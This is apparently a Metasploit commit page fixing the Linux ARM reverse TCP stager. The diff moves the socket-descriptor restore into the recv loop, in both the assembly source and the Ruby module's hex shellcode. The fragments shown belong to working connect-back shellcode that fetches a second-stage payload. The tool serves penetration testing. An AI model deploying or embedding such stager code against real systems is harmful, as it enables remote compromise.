Skip to content

Commit

Permalink
Land #19367, fix ARM stager restore r0 in loop
Browse files Browse the repository at this point in the history 
Land #19367, fix ARM stager restore r0 in loop
  • Loading branch information
@dledda-r7
dledda-r7 authored Jan 6, 2025
2 parents e801720 + cdc5122 commit 289e95d
Show file tree
Hide file tree
Showing 2 changed files with 3 additions and 3 deletions.
2 changes: 1 addition & 1 deletion external/source/shellcode/linux/armle/stager_sock_reverse.s
View file
Original file line number Diff line number Diff line change
Expand Up @@ -75,10 +75,10 @@ _start:
@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
add r7,#99 @ __NR_recv
mov r1,r0 @ *buf
mov r0,r12 @ sockfd
mov r3,#0 @ flags
@ remove blocksize from total length
loop:
mov r0,r12 @ sockfd
ldr r2,[sp,#0]
sub r2,#1000
str r2,[sp,#0]
Expand Down
4 changes: 2 additions & 2 deletions modules/payloads/stagers/linux/armle/reverse_tcp.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -77,9 +77,9 @@ def initialize(info = {})
0x0a000012, # beq <failed>
0xe2877063, # add r7, r7, #99 ; set 291(0x123) to r7
0xe1a01000, # mov r1, r0
0xe1a0000c, # mov r0, ip
0xe3a03000, # mov r3, #0
# loop:
0xe1a0000c, # mov r0, ip
0xe59d2000, # ldr r2, [sp]
0xe2422ffa, # sub r2, r2, #1000
0xe58d2000, # str r2, [sp]
Expand All @@ -89,7 +89,7 @@ def initialize(info = {})
0xef000000, # svc 0x00000000 ; invoke recv
0xe3500000, # cmp r0, #0
0xba000005, # blt 817c <failed>
0xeafffff5, # b 80dc <loop>
0xeafffff4, # b 80dc <loop>
# last:
0xe2822ffa, # add r2, r2, #1000
0xef000000, # svc 0x00000000 ; invoke recv
Expand Down

0 comments on commit 289e95d

Please sign in to comment.